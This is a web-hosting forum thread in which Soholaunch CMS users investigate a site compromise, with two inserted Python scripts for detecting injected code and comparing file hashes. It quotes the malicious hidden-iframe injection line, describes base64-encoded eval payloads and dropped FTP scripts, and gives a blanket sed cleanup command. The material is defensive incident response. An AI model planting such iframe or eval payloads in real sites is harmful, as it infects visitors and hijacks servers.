
"Trojan Horse"
#1
Posted 13 April 2007 - 05:24 PM
The thing is that I cannot see any such alert on my computers (windows xp with McAfee anti virus) and running sohoscan.php did not reveal any problems, either.
Has anyone else encountered this?
#2
Posted 14 April 2007 - 11:40 PM
#3
Posted 15 April 2007 - 10:44 PM
It's been reported as setting off anti-virus programs, but I believe it is still being included in the builds...
George Callaghan
#4
Posted 11 June 2010 - 11:21 AM
On every page is this:
<body> <iframe src="http://googlestat.org/stat/go.php?sid=1" width="0" height="0" frameborder="0"></iframe> </body>
(The first time it was a different url in the iframe)
I've traced the source of this code to shared_functions.php where it appeared once at the beginning of the regular php code, before the 'proper code' begins, and today it appears after the last ?>
I double checked the .htaccess file against another unhacked site and found a distinct difference, i.e. it was almost non-existent, so uploaded a modified version of that to the hacked site.
Now... my question is: where is this vulnerability occurring? Any ideas peeps?
Soho, Wordpress, Drupal, Joomla, etc Template & Web Design - Data Recovery
#5
Posted 11 June 2010 - 12:36 PM
We missed you around here.
I found the same thing on a site today for someone I'm helping here today.
I have not figured out yet how they got there.
dresswell
Free Soholaunch Hosting
Soholaunch Pro or Soholaunch Ultra Free with Hosting.
Check out our Soholaunch hosting if you've tried others
and were disappointed with your host or their support.
Get the help you need to build your website today.
Now offering a 99cent 1st. month Trial Offer.
Easy Website Maker
#6
Posted 11 June 2010 - 02:11 PM
Can you let me know where the shared_functions.php file is please so I can temporarily fix the problem. I will have to switch my clients to a new CMS one by one asap with this major problem - it has resulted unfortunately in the sites being blacklisted now on Google.
If anyone knows where the vulnerability has occurred, I too would like to know please.
Thanks.
#7
Posted 11 June 2010 - 02:37 PM
Also, look for a photo.php or photos.php file in your media folder, it will be completely encoded.
What versions are you all running? I was running the latest on mine.
Are any of you using any plugins too? I have two different plugins both by the same company on both of my sites. Those were the similarities between the two.
#8
Posted 11 June 2010 - 02:48 PM
It's very useful.
#9
Posted 11 June 2010 - 03:57 PM
Page.php, 404.php.
Looks like a eval(base64).
Heres how to remove it.
Got this from draknet.
Log in with ssh and run this command:
for file in $(grep "eval(base64_decode(" -lir *); do sed -i 's/eval(base64_decode(.*));//g' "$file"; done;
It will strip out that line from any file that has it (including ones that should, so be careful using this).
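Added example, not from any post in this thread and not Soholaunch's own sohoscan.php: a Python scanner that looks for the three indicators described in posts #4 and #9, a zero-size iframe, an eval(base64_decode("...")) call, and PHP code sitting after the file's final ?>. Rather than stripping matches with sed, it decodes each base64 payload so you can see what it does before deleting it, and its non-greedy pattern will not swallow legitimate code between two payloads on one line the way the greedy sed pattern above can. The file names and contents are constructed for the demo; the patterns only cover the literal-string form of the call, not eval(base64_decode($var)) or gzinflate chains.

```python
import base64
import os
import re
import tempfile

# Indicator patterns (constructed for this example, not from sohoscan.php).
HIDDEN_IFRAME = re.compile(
    r'<iframe[^>]*\ssrc=["\']([^"\']+)["\'][^>]*\s(?:width|height)=["\']0["\']',
    re.IGNORECASE,
)
# Only the literal-string form is matched; a variable argument or a gzinflate
# wrapper would need further patterns. Non-greedy so that two payloads on one
# line yield two findings instead of one.
EVAL_B64 = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)\s*;?'
)


def decode_payload(b64):
    """Decode a base64 payload for triage; return None if it is not valid base64."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-8", "replace")
    except (ValueError, UnicodeDecodeError):
        return None


def trailing_code(text):
    """Return any non-whitespace content after the last '?>' in a PHP file."""
    idx = text.rfind("?>")
    if idx == -1:
        return ""
    return text[idx + 2:].strip()


def scan_text(text):
    """Return a list of (indicator, detail) tuples for one file's contents."""
    findings = []
    for m in HIDDEN_IFRAME.finditer(text):
        findings.append(("hidden_iframe", m.group(1)))
    for m in EVAL_B64.finditer(text):
        decoded = decode_payload(m.group(1))
        findings.append(("eval_base64", decoded if decoded is not None else "<undecodable>"))
    tail = trailing_code(text)
    if tail:
        findings.append(("code_after_close_tag", tail[:80]))
    return findings


def scan_tree(root, exts=(".php",)):
    """Walk root and scan every file whose name ends with one of exts."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                found = scan_text(fh.read())
            if found:
                report[os.path.relpath(path, root).replace(os.sep, "/")] = found
    return report


# Constructed sample files mirroring what the posts describe.
SHARED_FUNCTIONS = (
    '<?php\nfunction soho_header() { return "ok"; }\n?>\n'
    '<body> <iframe src="http://googlestat.org/stat/go.php?sid=1" '
    'width="0" height="0" frameborder="0"></iframe> </body>\n'
)
PHOTO_PHP = ('<?php eval(base64_decode("'
             + base64.b64encode(b'echo "pwned";').decode() + '")); ?>\n')
CLEAN = '<?php\necho "hello";\n?>\n'


def demo():
    """Build a throw-away site tree, scan it and return the report."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "media"))
        for rel, body in (("shared_functions.php", SHARED_FUNCTIONS),
                          ("media/photo.php", PHOTO_PHP),
                          ("index.php", CLEAN)):
            with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)


if __name__ == "__main__":
    for path, findings in sorted(demo().items()):
        for kind, detail in findings:
            print(f"{path}: {kind}: {detail}")
```

Run it against a downloaded copy of the site with scan_tree("/path/to/site") and review each decoded payload before deleting anything; the decoded text is what tells you whether the dropped file was a mailer, a web shell or a redirector.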
#10
Posted 11 June 2010 - 04:15 PM
I just downloaded the entire site locally and did a 'find in files' command to locate the offending code.
Still unsure of how the exploit works though - although I did find that in the shopping directory the email to friend php file had both the ownership entirely removed as well as having no permissions whatsoever. Tried chmodding it to no avail and had to remove it from server and upload a good version from another Soho site.
Could be just a coincidence.. who knows?
Anyone?

Edit: If they get listed on Google as blacklisted (as my client did) as soon as you clean up the site you can request that they do another scan of the site - you need an account --> webmaster tools...
I'd hang fire on using another CMS until you know how the exploit was carried out: if one piece of software can be hacked, then so might another.....
Edited by DrJon, 11 June 2010 - 04:27 PM.
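Added example, not from DrJon's post and not part of Soholaunch: a Python baseline comparison of the kind the post above describes, hashing a known-clean copy of the site and diffing it against the live tree so that an appended shared_functions.php, a dropped media/photo.php, or a file whose permissions were altered shows up without searching for any particular string. It also lists world-writable files, since a file anyone on the host can write to is an easy place for the injection to come back. Both trees, their file names and modes are constructed for the demo.

```python
import hashlib
import os
import stat
import tempfile


def file_digest(path):
    """SHA-256 of a file's bytes, read in chunks so large media files are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def manifest(root):
    """Map relative path -> (sha256, permission bits) for every file under root."""
    out = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            out[rel] = (file_digest(path), stat.S_IMODE(os.stat(path).st_mode))
    return out


def compare(clean, suspect):
    """Classify each path as added, missing, modified or mode_changed."""
    result = {"added": [], "missing": [], "modified": [], "mode_changed": []}
    for rel, (digest, mode) in suspect.items():
        if rel not in clean:
            result["added"].append(rel)
        elif clean[rel][0] != digest:
            result["modified"].append(rel)
        elif clean[rel][1] != mode:
            result["mode_changed"].append(rel)
    result["missing"] = list(set(clean) - set(suspect))
    for key in result:
        result[key].sort()
    return result


def world_writable(suspect):
    """Files anyone on the host can write to; a common foothold for re-infection."""
    return sorted(rel for rel, (_d, mode) in suspect.items() if mode & stat.S_IWOTH)


def _write(root, rel, body, mode=0o644):
    """Helper for the demo: create a file with the given contents and mode."""
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(body)
    os.chmod(path, mode)


def demo():
    """Construct a clean and a compromised tree; return (diff, world-writable list)."""
    with tempfile.TemporaryDirectory() as clean_root, \
            tempfile.TemporaryDirectory() as live_root:
        for root in (clean_root, live_root):
            _write(root, "index.php", "<?php include 'shared_functions.php'; ?>\n")
            _write(root, "shopping/email_friend.php", "<?php /* mailer */ ?>\n")
        _write(clean_root, "shared_functions.php", "<?php function f() {} ?>\n")
        # Live copy: appended iframe, dropped file in media/, and a mode change.
        _write(live_root, "shared_functions.php",
               "<?php function f() {} ?>\n"
               "<iframe src=\"http://example.invalid/\" width=\"0\"></iframe>\n")
        _write(live_root, "media/photo.php", "<?php /* encoded */ ?>\n")
        os.chmod(os.path.join(live_root, "shopping/email_friend.php"), 0o666)
        suspect = manifest(live_root)
        return compare(manifest(clean_root), suspect), world_writable(suspect)


if __name__ == "__main__":
    diff, writable = demo()
    for kind, paths in diff.items():
        print(kind, paths)
    print("world-writable", writable)
```

Build the clean manifest from a fresh extract of the same Soholaunch version, not from a second live site, and store it off the server; once the site is cleaned, re-running compare on a schedule tells you whether the injection returns, which is the signal that the hole is still open.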
#11
Posted 11 June 2010 - 04:41 PM
What i do is run the installsoholaunch.php after the ssh command.
Seems to do the trick.
#12
Posted 11 June 2010 - 04:53 PM
#13
Posted 11 June 2010 - 05:06 PM
#14
Posted 11 June 2010 - 05:06 PM
As for the email a friend file... this little bugger has been causing issues since day 1, but I'm pretty sure when I was reading about changes in one of the last revisions, Soho said they had pretty much fixed all the issues with it.
I'm tempted to write a plugin that just eliminates it. I never have it turned on for any of my client's sites and ask them not to use it.
#15
Posted 11 June 2010 - 05:45 PM
I removed the code from the shared_functions.php file relating to that iframe. I also removed something called photo.php in the media folder which was base64 encoded... it's quite scary seeing someone else's user name and password in that file too... does anyone know what all of this did or what it was supposed to do to the site? I assume it was an automated script that targeted multiple sites?
Thanks Dr Jon for the info, I will ask for a rescan of the site in Webmaster Tools - wasn't aware you could do that there.
#16
Posted 11 June 2010 - 06:20 PM
Two points to mention here...
1. There were some exploits in older builds, but we have corrected them. Make sure you're running the latest version (as of right now v4.9.3 r38+).
2. sohoscan.php is your best friend for investigating hacks...
http://www.soholaunc...ia/sohoscan.zip
Please let us know via support ticket if you've cleaned a site, updated to v4.9.3 r38+ and THEN get hacked again (pointing to an outstanding vulnerability).
#17
Posted 11 June 2010 - 06:39 PM
#18
Posted 15 June 2010 - 12:00 PM
ini.php
function.php
prod_cust_card.php
thumb.php
They were all remote ftp programmes - not a good thing to have in your site !
AndyP
#19
Posted 21 June 2010 - 02:17 PM
The code was again attached to the end of the shared functions file so I've removed it and set the chmod to no write mode - we'll see if this makes a difference.

#20
Posted 21 June 2010 - 10:17 PM
DrakNet Web Hosting | (Or just me: jenlepp.com | Twitter: @jenlepp)
Please note that DrakNet no longer offers licensed Soholaunch as of 9/1/2010 - if you are looking at an old forum post that recommends us as a Soholaunch host, please note that situation has changed since the post was made.